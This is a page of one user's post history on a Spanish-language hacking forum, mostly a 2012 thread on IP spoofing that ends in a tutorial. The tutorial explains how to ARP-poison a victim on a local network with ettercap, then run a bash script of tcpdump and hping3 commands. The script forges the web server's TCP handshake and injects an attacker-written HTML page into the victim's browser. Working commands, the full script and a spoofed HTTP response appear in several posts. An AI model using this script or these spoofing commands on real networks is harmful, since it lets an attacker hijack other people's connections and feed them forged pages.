elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22
141  Programación / Programación C/C++ / Enviar paquetes TCP/IP en: 27 Marzo 2012, 16:24 pm
Buenas!

Quiero hacer un programa para enviar paquetes TCP y paquetes IP, solo enviar. ¿Me podeis decir alguna libreria e instrucciones basicas para poder hacerme el programa?
El programa lo voy ha hacer en C y sobre linux.

Gracias, un saludo!
142  Seguridad Informática / Hacking / Re: ¿Ip spoofing? [SOLUCIONADO] en: 26 Marzo 2012, 02:35 am
Citar
ero si yo consulto www.google.com y de ahi selecciono la web del hacker.net ya no funcionaria?? en este caso tu script que direccion suplantaria la de google o la de elhacker??

Depende, si yo mi script lo ejecuto y tu habres google, va a funcionar. Y si tienes google abierto y yo ahora ejecuto mi escript, haces la busqueda y no va a funcionar, pero cuando pinches en elhacker.net si que va a funcionar.

Cuando estas en google, significa que tienes un conexion establecida con el servidor web de google, si en se momento yo ejecuto mi script y tu haces una busqueda, podras ver perfectamente el resultado de la busqueda (la lista de webs) porque aun sigues con una conexion establecida con google, pero cuando pinches en una de las webs para visitarla, haras una nueva conexion con el servidor web al que quieres visitar y ahi es cuando funcionara.

Mi script lo que hace es suplantar la identidad de un servidor web justo en el inicio de la conexion, entonces cuando abras una web que no tengas abierta funcionara, pero si estas es una web y solo te mueves por los enlaces de esa web entonces no va a funcionar porque se basa en el inicio de conexion. Es decir, tu al conectarte a una web mandas un paquete TCP con el flag SYN y mi script te manda la respuesta del servidor que es otro paquete TCP con los flag SYN y ACK, luego mandaras un paquete HTTP con un GET (del fichero .html)y mi script te manda el fichero .html que yo quiero.

Mirate estos enlaces:
http://es.wikipedia.org/wiki/Transmission_Control_Protocol#Establecimiento_de_la_conexi.C3.B3n_.28negociaci.C3.B3n_en_tres_pasos.29

En la imagen de este enlace la flecha de datos es el metodo GET de HTTP, y la respuesta del servidor es enviar el fichero .html con una cabecera HTTP 200 OK!

Aun asi, mi script necesita mejoras aun que funciona. La primera de todas es que mi script es lento y hay algunas web que responden al inicio de conexion antes que mi script y por eso a veces no funciona, pero con las paginas que estan lejos de tu ordenador si, porque tarda mas tiempo enn responder al inicio de conexion y le da tiempo a mi script a adelantarse al servidor. Tambien podria hacer que no fuera dependiente del inicio de conexion y directamente en cuanto la victima haga cualquier GET que mi script inyecte mi fichero .html, pero para hacer estas mejoras necesito mas tiempo. El script que he puesto es la primera version funcional.
143  Seguridad Informática / Hacking / Re: ¿Ip spoofing? [SOLUCIONADO] en: 25 Marzo 2012, 16:44 pm
No estoy haciendo ningun enveneramiento DNS. Un envenamiento DNS consiste en explotar una vulnerabilidad en el servidor DNS para que cuando la victima se conecte a una web, dicho servidor le diga que la IP de esa web es la IP de mi ordenador. Pero eso no es lo que hago.

Mi script lo que hace es que cuando la victima se conecta con cualquier servidor web para visitar una pagina, yo le envio mi propio fichero .html diciendole a la victima que mi fichero es el de la web que busca. Para ello tengo que mandar el fichero poniendo como ip de origen la del servidor web al que se conecta la victima, es decir, spoofeo la ip del servidor.

Mi script deja que la victima haga una resolucion DNS correctamente, ya que eso no me afecta. Solo necesito saber la ip del servidor al que se conecta para suplantar su identidad spoofeando la ip.

Mirate estos enlaces:
http://es.wikipedia.org/wiki/Spoofing#IP_Spoofing
http://es.wikipedia.org/wiki/DNS_cache_poisoning#Ataques_de_Envenenamiento_de_Cach.C3.A9

Espero habertelo aclarado.
144  Seguridad Informática / Hacking / Re: ¿Ip spoofing? [SOLUCIONADO] en: 24 Marzo 2012, 23:39 pm
Si te soy sincero, este tipo de cosas las trabajo mas con linux, asi que de Cain se poco pero lo del DNS-Poison me parece interesante por que si aplicamos mi script a un DNS-Poison podria tener como objetivo a a victimias fuera de mi red....xD

De todas formas espero que esto os haya servido de explicacion tanto teorica como practica de los que es un MITM-Ip Spoof-Inyeccion PayLoad.

Un saludo.
145  Programación / Scripting / Script Bash lento.... en: 23 Marzo 2012, 18:00 pm
¡Buenas a todos!

He hecho est script en bash pero es demasiado lento.....hace muchos accesos a ficheros....
¿me podrian ayudar a optimizarlo?
Código
  1.        tcpdump -A -i wlan0 -nvXSs 0 -c1 tcp | grep cksum | grep  Flags | head -n 1 | cut -c5-130 > ficheroAux
  2.        ip1=$(cut -d' ' -f1 ficheroAux | cut -d. -f1-4)
  3.        port1=$(cut -d' ' -f1 ficheroAux| cut -d. -f5)
  4.        ip2=$(cut -d: -f1 ficheroAux | cut -d' ' -f2- |cut -d. -f1-4 | cut -c3-15)
  5.        port2=$(cut -d: -f1 ficheroAux | cut -d. -f9)
  6.        let seqnum=$(cut -dq -f2 ficheroAux | cut -c2-11 | cut -d, -f1)
  7.  
  8.        let seqnumInc=$seqnum+1
  9.  
  10.        hping3  -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567890 -L $seqnumInc -S -A -c 1
  11.  
  12.        let seqnumInc2=$seqnumInc+1
  13.  
  14.        hping3  -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567891 -L $seqnumInc2 -A -c 1
  15.        hping3  -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567891 -L $seqnumInc2 -A -P -c 1 -d 500 -E miFichero.html
  16.  
  17.        rm ficheroAux
  18.  

La parte que deberia cambiar son las asignaciones a las variables ip1, ip2, port1, port2 y seqnum
Esas variables deberia llenarlas sin tener que hacer una lectura para cada una de ellas o algo asi....

¿Alguna idea de como hacerlo?

Gracias, un saludo!
146  Seguridad Informática / Hacking / Re: ¿Ip spoofing? en: 23 Marzo 2012, 17:01 pm
¡BUENAS A TODOOOOOS!!!

Al fin lo HE CONSEGUIDO. Ya tengo el script y me ha funcionado jeje pero tengo que optimizarlo porque hay veces que si funciona y otras que no.....la buena noticia es que se porque no funciona ha veces! jeje

Asi que aqui os voy a dejar un tutorial de como lo hago el MITM+Ip-Spoofing+Inyencion de fichero .html

1) Prerrequisitos:
    SO: cualquier distribucion de linux (script en bash)
    programas: ettercap, tcpdump, hping3, grep, cut (estos 2 ultimos vienen con linux)

2) abrimos un terminal y ponemos: $ettercap -G
       con el ettercap en modo grafico pinchamos en: Sniff -> Unified sniffing y seleccionamos la interfaz que estemos usando (eth0 o wlan0...)
       pinchamos en: Host -> scan for hosts
       tras el escaneo pinchamos en: Host -> Host list   
       ahora veremos una lista de los host que hay dentro de nuestra LAN
       pinchamos en la ip del router y pinchamos en Add to Target 1   
       pinchamos en la ip de la victima y pinchamos en Add to Target 2
       pinchamos en: Start -> Start sniffing
       pinchamos en: Mitm -> Arp poisoning

       #Ya estamos haciendo un Man In The Middle

3) copiamos siguiente script:
Código
  1.        tcpdump -A -i wlan0 -nvXSs 0 -c1 tcp | grep cksum | grep  Flags | head -n 1 | cut -c5-130 > ficheroAux
  2.        ip1=$(cut -d' ' -f1 ficheroAux | cut -d. -f1-4)
  3.        port1=$(cut -d' ' -f1 ficheroAux| cut -d. -f5)
  4.        ip2=$(cut -d: -f1 ficheroAux | cut -d' ' -f2- |cut -d. -f1-4 | cut -c3-15)
  5.        port2=$(cut -d: -f1 ficheroAux | cut -d. -f9)
  6.        let seqnum=$(cut -dq -f2 ficheroAux | cut -c2-11 | cut -d, -f1)
  7.  
  8.        let seqnumInc=$seqnum+1
  9.  
  10.        hping3  -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567890 -L $seqnumInc -S -A -c 1
  11.  
  12.        let seqnumInc2=$seqnumInc+1
  13.  
  14.        hping3  -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567891 -L $seqnumInc2 -A -c 1
  15.        hping3  -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567891 -L $seqnumInc2 -A -P -c 1 -d 500 -E miFichero.html
  16.  
  17.        rm ficheroAux
  18.  

        En la ultima linea del hping3 cambiais miFichero.html por la ruta de un fichero vuestro en html con el siguiente formato:

Citar
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 150
Date: Thu, 22 Mar 2012 02:02:42 GMT
Server: gws

<html>
          Aqui podeis poner el texto que querais
</html>


4) ejecutais el script, y cuando la victima visite un web (ej.: www.facebook.com).........
        VOILA! se le habrio nuestro fichero html!!!


NOTA: El script es un poco lento...y si la victima hace la conexion muy rapida con el servidor web no funcionara....pero a mi con facebook.com me ha funcionado.

NOTA 2: Ahora estoy buscando una forma de optimizar el script para que sea mas rapido y funcione siempre. Ademas tengo la intencion de introducir  la parte del ettercap dentro del script para que solo sea ejecutar y listo! jejeje

PD: NO ME HAGO RESPONSABLE DEL USO INDEBIDO DE ESTE TUTORIAL. SI ALGUIEN LO PONE EN PRACTICA QUE LO HAGA EN SU PROPIA RED Y CON SUS PROPIOS ORDENADORES!!!!


Un saludo a todos!!
147  Seguridad Informática / Hacking / Re: ¿Ip spoofing? en: 22 Marzo 2012, 02:23 am
¡Buenas a todos!

Aun sigo un poco atascado con el tema....soy capaz de hacer el MITM y el IP-Spoofing, pero el navegador de la victima no habre mi fichero html...

Para hacer el ip-spoofing tengo el siguiente script que simula la respuesta del servidor web a una conexion TCP para HTTP:
Citar
while true;
do
hping3  -a 173.194.34.247 192.168.1.134 -s 80 -p 80 -M 1000 -S -A -c 1;
# -a IpServidor IpVictima -s PuertoOrigen -P PuertoDestino -M seqnum -S (SYN) -A (ACK) -c NumPackt

hping3 -a 173.194.34.247 192.168.1.134 -s 80 -p 80 -M 1001 -A -c 1;
# -a IpServidor IpVictima -s PuertoOrigen -P PuertoDestino -M seqnum -A (ACK) -c NumPackt

hping3 -a 173.194.34.247 192.168.1.134 -s 80 -p 80 -M 1002 -P -A -c 1 -d 150 -E miFichero.html;
# -a IpServidor IpVictima -s PuertoOrigen -P PuertoDestino -M seqnum -P (PUSH) -A(ACK) -c numPack -d dataSize -E fichero
done
¿Alguna idea de porque falla?
La respuesta del servidor es SYN/ACK y ACK y luego los datos con el flag PUSH/ACK no???

¿Alguna idea de porque falla la conexion?

PD: mi fichero html es este....:
Citar
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 150
Date: Thu, 22 Mar 2012 02:02:42 GMT
Server: gws

<html>
Discover all host of LAN:
        nmap -sP 192.168.1.*
Visualizar imagenes en un MITM
        driftnet -i wlan0
Visualizar urls en un MITM
        urlsnarf -i wlan0
ettercap
        ettercap -G
hping3
         hping3  95.131.168.181 -s 80 -p 80 -M 122 -S -c 1 -d 150 -E miFichero.html
</html>

148  Seguridad Informática / Hacking / Re: ¿Ip spoofing? en: 20 Marzo 2012, 22:40 pm
El ip-spoofing, como ya dije mas arriba, lo hago con hping3, y lo hago de la siguiente manera:
Citar
hping3  -a 80.80.80.80 95.131.168.181 -s 80 -p 80 -M 122 -S -c 1 -d 150 -E miFichero.html
ip-spoofeada: 80.80.80.80
ip-victima: 95.131.168.181
puerto origen: -s 80
puerto destino: -p 80
seqnum: 123 (Como dije antes, el seq num es el que se pasa con el -M +1, si -M 122, entonces seqnum=123)
numero de paquetes a enviar: -c 1
tamaño campo de datos: -d 150
datos a enviar: miFichero.html

Un saludo!
149  Seguridad Informática / Hacking / Re: ¿Ip spoofing? en: 20 Marzo 2012, 21:46 pm
OOOK! estaba en lo cierto! el wireshark enmascara los seqnum, al desabilitar esta opcion comprobe que el seqnum que se pone en el paquete enviado es el seqnum que pones en hping3 +1, por tanto si pongo en el terminal lo siguiente:
Citar
hping3  95.131.168.181 -s 23 -p 80 -w 200 -M 1234 -S -c 1 -d 150 -E miFichero.txt

entonces se enviara un paquete  a dicha ip cuyo seq num es: 1235!!!!!

Ahora solo me queda hacer la prueba para ver si el navegador del host victima habre mi fichero html haciendo el ip-spoofing! si lo consigo os hare un tutorial!! jeje ;)
150  Seguridad Informática / Hacking / Re: ¿Ip spoofing? en: 20 Marzo 2012, 21:32 pm
Bueno....creo que ya empiezo a dar con la respuesta..........

Como sniffer uso wireshark y cuando ejecuto el comando hping3 que dije antes, me pone que el numero de secuencia relativo es el 0.....y es que al parecer wireshark enmascara los numeros de secuencia. Por tanto si yo con hping3 le pongo que el 1º seqnum sea el 123 y un data-size de 100, wireshar en vez de mostrarme que el 1º paquete tiene de seq num el 123 y el 2º paquete tiene eel 223, este pone que el 1º paquete tiene un seqnum=0 y el 2º paquete tiene de seqnum=100...........

¿Alguien sabe como desenmascarar los seqnum en wireshark para quee muestre los reales y no los seqnum relativos?

Gracias, un saludo!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines